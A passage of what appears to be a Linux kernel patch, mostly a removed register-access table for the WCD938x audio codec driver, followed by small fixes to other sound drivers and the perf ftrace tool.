+-	case WCD938X_CLASSH_CTRL_VCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_1:
+-	case WCD938X_CLASSH_CTRL_CCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_3:
+-	case WCD938X_CLASSH_CTRL_CCL_4:
+-	case WCD938X_CLASSH_CTRL_CCL_5:
+-	case WCD938X_CLASSH_BUCK_TMUX_A_D:
+-	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
+-	case WCD938X_CLASSH_SPARE:
+-	case WCD938X_FLYBACK_EN:
+-	case WCD938X_FLYBACK_VNEG_CTRL_1:
+-	case WCD938X_FLYBACK_VNEG_CTRL_2:
+-	case WCD938X_FLYBACK_VNEG_CTRL_3:
+-	case WCD938X_FLYBACK_VNEG_CTRL_4:
+-	case WCD938X_FLYBACK_VNEG_CTRL_5:
+-	case WCD938X_FLYBACK_VNEG_CTRL_6:
+-	case WCD938X_FLYBACK_VNEG_CTRL_7:
+-	case WCD938X_FLYBACK_VNEG_CTRL_8:
+-	case WCD938X_FLYBACK_VNEG_CTRL_9:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
+-	case WCD938X_FLYBACK_CTRL_1:
+-	case WCD938X_FLYBACK_TEST_CTL:
+-	case WCD938X_RX_AUX_SW_CTL:
+-	case WCD938X_RX_PA_AUX_IN_CONN:
+-	case WCD938X_RX_TIMER_DIV:
+-	case WCD938X_RX_OCP_CTL:
+-	case WCD938X_RX_OCP_COUNT:
+-	case WCD938X_RX_BIAS_EAR_DAC:
+-	case WCD938X_RX_BIAS_EAR_AMP:
+-	case WCD938X_RX_BIAS_HPH_LDO:
+-	case WCD938X_RX_BIAS_HPH_PA:
+-	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
+-	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
+-	case WCD938X_RX_BIAS_HPH_CNP1:
+-	case WCD938X_RX_BIAS_HPH_LOWPOWER:
+-	case WCD938X_RX_BIAS_AUX_DAC:
+-	case WCD938X_RX_BIAS_AUX_AMP:
+-	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
+-	case WCD938X_RX_BIAS_MISC:
+-	case WCD938X_RX_BIAS_BUCK_RST:
+-	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_BUFF:
+-	case WCD938X_RX_BIAS_FLYB_MID_RST:
+-	case WCD938X_HPH_CNP_EN:
+-	case WCD938X_HPH_CNP_WG_CTL:
+-	case WCD938X_HPH_CNP_WG_TIME:
+-	case WCD938X_HPH_OCP_CTL:
+-	case WCD938X_HPH_AUTO_CHOP:
+-	case WCD938X_HPH_CHOP_CTL:
+-	case WCD938X_HPH_PA_CTL1:
+-	case WCD938X_HPH_PA_CTL2:
+-	case WCD938X_HPH_L_EN:
+-	case WCD938X_HPH_L_TEST:
+-	case WCD938X_HPH_L_ATEST:
+-	case WCD938X_HPH_R_EN:
+-	case WCD938X_HPH_R_TEST:
+-	case WCD938X_HPH_R_ATEST:
+-	case WCD938X_HPH_RDAC_CLK_CTL1:
+-	case WCD938X_HPH_RDAC_CLK_CTL2:
+-	case WCD938X_HPH_RDAC_LDO_CTL:
+-	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
+-	case WCD938X_HPH_REFBUFF_UHQA_CTL:
+-	case WCD938X_HPH_REFBUFF_LP_CTL:
+-	case WCD938X_HPH_L_DAC_CTL:
+-	case WCD938X_HPH_R_DAC_CTL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
+-	case WCD938X_EAR_EAR_EN_REG:
+-	case WCD938X_EAR_EAR_PA_CON:
+-	case WCD938X_EAR_EAR_SP_CON:
+-	case WCD938X_EAR_EAR_DAC_CON:
+-	case WCD938X_EAR_EAR_CNP_FSM_CON:
+-	case WCD938X_EAR_TEST_CTL:
+-	case WCD938X_ANA_NEW_PAGE_REGISTER:
+-	case WCD938X_HPH_NEW_ANA_HPH2:
+-	case WCD938X_HPH_NEW_ANA_HPH3:
+-	case WCD938X_SLEEP_CTL:
+-	case WCD938X_SLEEP_WATCHDOG_CTL:
+-	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
+-	case WCD938X_MBHC_NEW_CTL_1:
+-	case WCD938X_MBHC_NEW_CTL_2:
+-	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
+-	case WCD938X_TX_NEW_AMIC_MUX_CFG:
+-	case WCD938X_AUX_AUXPA:
+-	case WCD938X_LDORXTX_MODE:
+-	case WCD938X_LDORXTX_CONFIG:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
+-	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
+-	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
+-	case WCD938X_HPH_NEW_INT_PA_MISC1:
+-	case WCD938X_HPH_NEW_INT_PA_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
+-	case WCD938X_MBHC_NEW_INT_SPARE_2:
+-	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
+-	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
+-	case WCD938X_AUX_INT_EN_REG:
+-	case WCD938X_AUX_INT_PA_CTRL:
+-	case WCD938X_AUX_INT_SP_CTRL:
+-	case WCD938X_AUX_INT_DAC_CTRL:
+-	case WCD938X_AUX_INT_CLK_CTRL:
+-	case WCD938X_AUX_INT_TEST_CTRL:
+-	case WCD938X_AUX_INT_MISC:
+-	case WCD938X_LDORXTX_INT_BIAS:
+-	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
+-	case WCD938X_LDORXTX_INT_TEST0:
+-	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
+-	case WCD938X_LDORXTX_INT_TEST1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
+-	case WCD938X_DIGITAL_PAGE_REGISTER:
+-	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
+-	case WCD938X_DIGITAL_CDC_RST_CTL:
+-	case WCD938X_DIGITAL_TOP_CLK_CFG:
+-	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
+-	case WCD938X_DIGITAL_SWR_RST_EN:
+-	case WCD938X_DIGITAL_CDC_PATH_MODE:
+-	case WCD938X_DIGITAL_CDC_RX_RST:
+-	case WCD938X_DIGITAL_CDC_RX0_CTL:
+-	case WCD938X_DIGITAL_CDC_RX1_CTL:
+-	case WCD938X_DIGITAL_CDC_RX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
+-	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
+-	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
+-	case WCD938X_DIGITAL_CDC_SWR_CLH:
+-	case WCD938X_DIGITAL_SWR_CLH_BYP:
+-	case WCD938X_DIGITAL_CDC_TX0_CTL:
+-	case WCD938X_DIGITAL_CDC_TX1_CTL:
+-	case WCD938X_DIGITAL_CDC_TX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_RST:
+-	case WCD938X_DIGITAL_CDC_REQ_CTL:
+-	case WCD938X_DIGITAL_CDC_RST:
+-	case WCD938X_DIGITAL_CDC_AMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
+-	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
+-	case WCD938X_DIGITAL_EFUSE_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
+-	case WCD938X_DIGITAL_PDM_WD_CTL0:
+-	case WCD938X_DIGITAL_PDM_WD_CTL1:
+-	case WCD938X_DIGITAL_PDM_WD_CTL2:
+-	case WCD938X_DIGITAL_INTR_MODE:
+-	case WCD938X_DIGITAL_INTR_MASK_0:
+-	case WCD938X_DIGITAL_INTR_MASK_1:
+-	case WCD938X_DIGITAL_INTR_MASK_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_INTR_LEVEL_0:
+-	case WCD938X_DIGITAL_INTR_LEVEL_1:
+-	case WCD938X_DIGITAL_INTR_LEVEL_2:
+-	case WCD938X_DIGITAL_INTR_SET_0:
+-	case WCD938X_DIGITAL_INTR_SET_1:
+-	case WCD938X_DIGITAL_INTR_SET_2:
+-	case WCD938X_DIGITAL_INTR_TEST_0:
+-	case WCD938X_DIGITAL_INTR_TEST_1:
+-	case WCD938X_DIGITAL_INTR_TEST_2:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
+-	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
+-	case WCD938X_DIGITAL_LOOP_BACK_MODE:
+-	case WCD938X_DIGITAL_SWR_DAC_TEST:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
+-	case WCD938X_DIGITAL_I2C_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_0:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
+-	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_GPIO_MODE:
+-	case WCD938X_DIGITAL_PIN_CTL_OE:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
+-	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
+-	case WCD938X_DIGITAL_DIG_DEBUG_EN:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
+-	case WCD938X_DIGITAL_SSP_DBG:
+-	case WCD938X_DIGITAL_SPARE_0:
+-	case WCD938X_DIGITAL_SPARE_1:
+-	case WCD938X_DIGITAL_SPARE_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
+-		return true;
+-	}
+-
+-	return false;
+-}
+-
+-static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_MBHC_RESULT_1:
+-	case WCD938X_ANA_MBHC_RESULT_2:
+-	case WCD938X_ANA_MBHC_RESULT_3:
+-	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
+-	case WCD938X_TX_1_2_SAR2_ERR:
+-	case WCD938X_TX_1_2_SAR1_ERR:
+-	case WCD938X_TX_3_4_SAR4_ERR:
+-	case WCD938X_TX_3_4_SAR3_ERR:
+-	case WCD938X_HPH_L_STATUS:
+-	case WCD938X_HPH_R_STATUS:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
+-	case WCD938X_EAR_STATUS_REG_1:
+-	case WCD938X_EAR_STATUS_REG_2:
+-	case WCD938X_MBHC_NEW_FSM_STATUS:
+-	case WCD938X_MBHC_NEW_ADC_RESULT:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
+-	case WCD938X_AUX_INT_STATUS_REG:
+-	case WCD938X_LDORXTX_INT_STATUS:
+-	case WCD938X_DIGITAL_CHIP_ID0:
+-	case WCD938X_DIGITAL_CHIP_ID1:
+-	case WCD938X_DIGITAL_CHIP_ID2:
+-	case WCD938X_DIGITAL_CHIP_ID3:
+-	case WCD938X_DIGITAL_INTR_STATUS_0:
+-	case WCD938X_DIGITAL_INTR_STATUS_1:
+-	case WCD938X_DIGITAL_INTR_STATUS_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_1:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
+-	case WCD938X_DIGITAL_PIN_STATUS_0:
+-	case WCD938X_DIGITAL_PIN_STATUS_1:
+-	case WCD938X_DIGITAL_MODE_STATUS_0:
+-	case WCD938X_DIGITAL_MODE_STATUS_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_0:
+-	case WCD938X_DIGITAL_EFUSE_REG_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_2:
+-	case WCD938X_DIGITAL_EFUSE_REG_3:
+-	case WCD938X_DIGITAL_EFUSE_REG_4:
+-	case WCD938X_DIGITAL_EFUSE_REG_5:
+-	case WCD938X_DIGITAL_EFUSE_REG_6:
+-	case WCD938X_DIGITAL_EFUSE_REG_7:
+-	case WCD938X_DIGITAL_EFUSE_REG_8:
+-	case WCD938X_DIGITAL_EFUSE_REG_9:
+-	case WCD938X_DIGITAL_EFUSE_REG_10:
+-	case WCD938X_DIGITAL_EFUSE_REG_11:
+-	case WCD938X_DIGITAL_EFUSE_REG_12:
+-	case WCD938X_DIGITAL_EFUSE_REG_13:
+-	case WCD938X_DIGITAL_EFUSE_REG_14:
+-	case WCD938X_DIGITAL_EFUSE_REG_15:
+-	case WCD938X_DIGITAL_EFUSE_REG_16:
+-	case WCD938X_DIGITAL_EFUSE_REG_17:
+-	case WCD938X_DIGITAL_EFUSE_REG_18:
+-	case WCD938X_DIGITAL_EFUSE_REG_19:
+-	case WCD938X_DIGITAL_EFUSE_REG_20:
+-	case WCD938X_DIGITAL_EFUSE_REG_21:
+-	case WCD938X_DIGITAL_EFUSE_REG_22:
+-	case WCD938X_DIGITAL_EFUSE_REG_23:
+-	case WCD938X_DIGITAL_EFUSE_REG_24:
+-	case WCD938X_DIGITAL_EFUSE_REG_25:
+-	case WCD938X_DIGITAL_EFUSE_REG_26:
+-	case WCD938X_DIGITAL_EFUSE_REG_27:
+-	case WCD938X_DIGITAL_EFUSE_REG_28:
+-	case WCD938X_DIGITAL_EFUSE_REG_29:
+-	case WCD938X_DIGITAL_EFUSE_REG_30:
+-	case WCD938X_DIGITAL_EFUSE_REG_31:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
+-{
+-	bool ret;
+-
+-	ret = wcd938x_readonly_register(dev, reg);
+-	if (!ret)
+-		return wcd938x_rdwr_register(dev, reg);
+-
+-	return ret;
+-}
+-
+-static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
+-{
+-	return wcd938x_rdwr_register(dev, reg);
+-}
+-
+-static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
+-{
+-	if (reg <= WCD938X_BASE_ADDRESS)
+-		return false;
+-
+-	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
+-		return true;
+-
+-	if (wcd938x_readonly_register(dev, reg))
+-		return true;
+-
+-	return false;
+-}
+-
+-static struct regmap_config wcd938x_regmap_config = {
+-	.name = "wcd938x_csr",
+-	.reg_bits = 32,
+-	.val_bits = 8,
+-	.cache_type = REGCACHE_RBTREE,
+-	.reg_defaults = wcd938x_defaults,
+-	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
+-	.max_register = WCD938X_MAX_REGISTER,
+-	.readable_reg = wcd938x_readable_register,
+-	.writeable_reg = wcd938x_writeable_register,
+-	.volatile_reg = wcd938x_volatile_register,
+-	.can_multi_write = true,
+-};
+-
+ static const struct regmap_irq wcd938x_irqs[WCD938X_NUM_IRQS] = {
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_PRESS_DET, 0, 0x01),
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_RELEASE_DET, 0, 0x02),
+@@ -4412,10 +3417,10 @@ static int wcd938x_bind(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	wcd938x->regmap = devm_regmap_init_sdw(wcd938x->tx_sdw_dev, &wcd938x_regmap_config);
+-	if (IS_ERR(wcd938x->regmap)) {
+-		dev_err(dev, "%s: tx csr regmap not found\n", __func__);
+-		return PTR_ERR(wcd938x->regmap);
++	wcd938x->regmap = dev_get_regmap(&wcd938x->tx_sdw_dev->dev, NULL);
++	if (!wcd938x->regmap) {
++		dev_err(dev, "could not get TX device regmap\n");
++		return -EINVAL;
+ 	}
+ 
+ 	ret = wcd938x_irq_init(wcd938x, dev);
+diff --git a/sound/soc/codecs/wcd938x.h b/sound/soc/codecs/wcd938x.h
+index ea82039e78435..74b1498fec38b 100644
+--- a/sound/soc/codecs/wcd938x.h
++++ b/sound/soc/codecs/wcd938x.h
+@@ -663,6 +663,7 @@ struct wcd938x_sdw_priv {
+ 	bool is_tx;
+ 	struct wcd938x_priv *wcd938x;
+ 	struct irq_domain *slave_irq;
++	struct regmap *regmap;
+ };
+ 
+ #if IS_ENABLED(CONFIG_SND_SOC_WCD938X_SDW)
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 6c8b1db649b89..046843b57b038 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -1101,7 +1101,7 @@ static int wsa881x_bus_config(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa881x_slave_ops = {
++static const struct sdw_slave_ops wsa881x_slave_ops = {
+ 	.update_status = wsa881x_update_status,
+ 	.bus_config = wsa881x_bus_config,
+ 	.port_prep = wsa881x_port_prep,
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 2533d0973529f..6e9a64c5948e2 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1073,7 +1073,7 @@ static int wsa883x_port_prep(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa883x_slave_ops = {
++static const struct sdw_slave_ops wsa883x_slave_ops = {
+ 	.update_status = wsa883x_update_status,
+ 	.port_prep = wsa883x_port_prep,
+ };
+diff --git a/sound/soc/intel/common/soc-acpi-intel-byt-match.c b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+index db5a92b9875a8..87c44f284971a 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-byt-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+@@ -124,7 +124,7 @@ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ };
+ 
+ static const struct snd_soc_acpi_codecs wm5102_comp_ids = {
+-	.num_codecs = 2,
++	.num_codecs = 3,
+ 	.codecs = { "10WM5102", "WM510204", "WM510205"},
+ };
+ 
+diff --git a/sound/usb/caiaq/input.c b/sound/usb/caiaq/input.c
+index 1e2cf2f08eecd..84f26dce7f5d0 100644
+--- a/sound/usb/caiaq/input.c
++++ b/sound/usb/caiaq/input.c
+@@ -804,6 +804,7 @@ int snd_usb_caiaq_input_init(struct snd_usb_caiaqdev *cdev)
+ 
+ 	default:
+ 		/* no input methods supported on this device */
++		ret = -EINVAL;
+ 		goto exit_free_idev;
+ 	}
+ 
+diff --git a/tools/perf/builtin-ftrace.c b/tools/perf/builtin-ftrace.c
+index 7de07bb16d235..4bc5b7cf3e04b 100644
+--- a/tools/perf/builtin-ftrace.c
++++ b/tools/perf/builtin-ftrace.c
+@@ -1228,10 +1228,12 @@ int cmd_ftrace(int argc, const char **argv)
+ 		goto out_delete_filters;
+ 	}
+ 
++	/* Make system wide (-a) the default target. */
++	if (!argc && target__none(&ftrace.target))
++		ftrace.target.system_wide = true;
++
+ 	switch (subcmd) {
+ 	case PERF_FTRACE_TRACE:
+-		if (!argc && target__none(&ftrace.target))
+-			ftrace.target.system_wide = true;
+ 		cmd_func = __cmd_ftrace;
+ 		break;
+ 	case PERF_FTRACE_LATENCY:
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 48c3461b496c4..7314183cdcb6c 100644
+--- a/tools/perf/builtin-record.c
